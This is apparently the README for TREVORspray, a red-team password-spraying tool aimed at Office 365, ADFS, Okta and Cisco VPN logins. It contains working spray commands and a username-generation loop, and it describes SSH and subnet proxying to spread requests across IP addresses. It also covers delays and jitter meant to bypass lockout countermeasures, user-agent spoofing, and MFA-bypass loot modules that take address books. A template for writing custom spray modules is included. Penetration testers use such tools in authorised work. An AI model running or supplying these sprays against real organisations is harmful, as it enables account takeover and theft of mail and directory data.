
TREVORspray is a modular password sprayer with threading, clever proxying, loot modules, and more!

Primary LanguagePythonGNU General Public License v3.0GPL-3.0

TREVORspray 2.0

TREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!

By @thetechr0mancer

License Python Version


pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

See the accompanying Blog Post for a fun rant and some cool demos!



  • Threads, lots of threads
  • Multiple modules
    • msol (Office 365)
    • adfs (Active Directory Federation Services)
    • okta (Okta SSO)
    • anyconnect (Cisco VPN)
    • custom modules (easy to make!)
  • Tells you the status of each account: if it exists, is locked, has MFA enabled, etc.
  • Automatic cancel/resume (remembers already-tried user/pass combos in ~/.trevorspray/tried_logins.txt)
  • Round-robin proxy through multiple IPs with --ssh or --subnet
  • Automatic infinite reconnect/retry if a proxy goes down (or if you lose internet)
  • Spoofs User-Agent and other signatures to look like legitimate auth traffic
  • Comprehensive logging
  • Optional --delay, --jitter, and --lockout-delay between requests to bypass lockout countermeasures
  • IPv6 support
  • O365 MFA bypass support (disable with --no-loot)
    • IMAP
    • SMTP
    • POP
    • EWS (Exchange Web Services) - Automatically retrieves GAL (Global Address Book)
    • EAS (Exchange ActiveSync)
    • EXO (Exchange Online PowerShell)
    • UM (Exchange Unified Messaging)
    • AutoDiscover - Automatically retrieves OAB (Offline Address Book)
    • Azure Portal Access
  • Domain --recon to list MX/TXT records, O365 tenant info, federation configuration, autodiscover, etc.

How To - O365

  • First, get a list of emails for corp.com and perform a spray to see if the default configuration works. Usually it does.
  • If TREVORspray says the emails in your list don't exist, don't give up. Get the token_endpoint with --recon corp.com. The token_endpoint is the URL you'll be spraying against (with the --url option).
  • It may take some experimentation before you find the right combination of token_endpoint + email format.
    • For example, if you're attacking corp.com, it may not be as easy as spraying corp.com. You may find that Corp's parent company Evilcorp owns their Azure tenant, meaning that you need to spray against evilcorp.com's token_endpoint. Also, you may find that corp.com's internal domain corp.local is used instead of corp.com.
    • So in the end, instead of spraying bob@corp.com against corp.com's token_endpoint, you're spraying bob@corp.local against evilcorp.com's.

Example: Perform recon against a domain (retrieves tenant info, autodiscover, mx records, etc.)

trevorspray --recon evilcorp.com
    "token_endpoint": "https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token"

Example: Spray against discovered "token_endpoint" URL

trevorspray -u emails.txt -p 'Fall2021!' --url https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token

Example: Spray with 5-second delay between requests

trevorspray -u bob@evilcorp.com -p 'Fall2021!' --delay 5

Example: Spray and round-robin between 3 IPs (the current IP is also used, unless -n is specified)

trevorspray -u emails.txt -p 'Fall2021!' --ssh root@ root@

Example: Find valid usernames without OSINT >:D

# clone wordsmith dataset
wget https://github.com/skahwah/wordsmith/releases/download/v2.1.1/data.tar.xz && tar -xvf data.tar.xz && cd data

# order first initial by occurrence

# loop through first initials
echo -n $ordered_letters | while read -n1 f; do
  # loop through top 2000 USA last names
  head -n 2000 'usa/lnames.txt' | while read last; do
    # generate emails in f.last format
    echo "${f}.${last}@evilcorp.com"
done | tee f.last.txt

trevorspray -u f.last.txt -p 'Fall2021!'

Extract data from downloaded LZX files

When TREVORspray successfully bypasses MFA and retrieves an Offline Address Book (OAB), the address book is downloaded in LZX format to ~/.trevorspray/loot. LZX is an ancient and obnoxious encryption algorithm used by Microsoft.

# get libmspack (for extracting LZX file)
git clone https://github.com/kyz/libmspack
cd libmspack/libmspack/

# extract LZX file
./examples/.libs/oabextract ~/.trevorspray/loot/deadbeef-ce01-4ec9-9d08-1050bdc41131-data-1.lzx oab.bin
# extract all strings
strings oab.bin
# extract and dedupe emails
egrep -oa '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}' oab.bin | tr '[:upper:]' '[:lower:]' | sort -u

TREVORspray - Help:

$ trevorspray --help
usage: trevorspray [-h] [-u USERS [USERS ...]] [-p PASSWORDS [PASSWORDS ...]] [--url URL] [-t THREADS]
                   [-r DOMAIN [DOMAIN ...]] [-f] [-d DELAY] [-ld LOCKOUT_DELAY] [-j JITTER] [-e] [-nl] [--timeout TIMEOUT]
                   [--random-useragent] [-m {okta,anyconnect,adfs,msol}] [-6] [--proxy PROXY] [-v]
                   [-s USER@SERVER [USER@SERVER ...]] [-i KEY] [-b BASE_PORT] [-n] [--interface INTERFACE] [--subnet SUBNET]

A password sprayer with the option to load-balance traffic through SSH hosts

optional arguments:
  -h, --help            show this help message and exit
  -m {okta,anyconnect,adfs,msol}, --module {okta,anyconnect,adfs,msol}
                        Spray module to use (default: msol)
  -u USERS [USERS ...], --users USERS [USERS ...]
                        Usernames(s) and/or file(s) containing usernames
                        Password(s) that will be used to perform the password spray
  --url URL             The URL to spray against
  -t THREADS, --threads THREADS
                        Max number of concurrent requests (default: 1)
  -r DOMAIN [DOMAIN ...], --recon DOMAIN [DOMAIN ...]
                        Retrieves MX records and info related to authentication, email, Azure, Microsoft 365, etc.
  -f, --force           Forces the spray to continue and not stop when multiple account lockouts are detected
  -d DELAY, --delay DELAY
                        Sleep for this many seconds between requests
  -ld LOCKOUT_DELAY, --lockout-delay LOCKOUT_DELAY
                        Sleep for this many additional seconds when a lockout is encountered
  -j JITTER, --jitter JITTER
                        Add a random delay of up to this many seconds between requests
  -e, --exit-on-success
                        Stop spray when a valid cred is found
  -nl, --no-loot        Don't execute loot activites for valid accounts
  --timeout TIMEOUT     Connection timeout in seconds (default: 10)
  --random-useragent    Add a random value to the User-Agent for each request
  -6, --prefer-ipv6     Prefer IPv6 over IPv4
  --proxy PROXY         Proxy to use for HTTP and HTTPS requests
  -v, --verbose, --debug
                        Show which proxy is being used for each request

SSH Proxy:
  Round-robin traffic through remote systems via SSH (overrides --threads)

                        Round-robin load-balance through these SSH hosts (user@host) NOTE: Current IP address is also used
                        once per round
  -i KEY, -k KEY, --key KEY
                        Use this SSH key when connecting to proxy hosts
  -b BASE_PORT, --base-port BASE_PORT
                        Base listening port to use for SOCKS proxies
  -n, --no-current-ip   Don't spray from the current IP, only use SSH proxies

Subnet Proxy:
  Send traffic from random addresses within IP subnet

  --interface INTERFACE
                        Interface to send packets on
  --subnet SUBNET       Subnet to send packets from

Writing your own Spray Modules

Writing your own spray modules is pretty straightforward. Create a new .py file in lib/sprayers (e.g. lib/sprayers/example.py), and fill out the HTTP method and any other parameters that you need in the requests. You can then use the module by specifying -m example. You can call the class whatever you want, but it needs to inherit from BaseSprayModule.

# Example spray module

from .base import BaseSprayModule

class SprayModule(BaseSprayModule):

    # HTTP method
    method = 'POST'
    # default target URL
    default_url = 'https://login.evilcorp.com/'
    # body of request
    request_data = 'user={username}&pass={password}&group={otherthing}'
    # HTTP headers
    headers = {}
    # HTTP cookies
    cookies = {}
    # Don't count nonexistent accounts as failed logons
    fail_nonexistent = False

    headers = {
        'User-Agent': 'Your Moms Smart Vibrator',

    def initialize(self):
        Get additional arguments from user at runtime
        NOTE: These can also be passed via environment variables beginning with "TREVOR_":
        while not self.runtimeparams.get('otherthing', ''):
                'otherthing': input("What's that other thing? ")

        return True

    def check_response(self, response):
        returns (valid, exists, locked, msg)

        valid = False
        exists = None
        locked = None
        msg = ''

        if getattr(response, 'status_code', 0) == 200:
            valid = True
            exists = True
            msg = 'Valid cred'

        return (valid, exists, locked, msg)


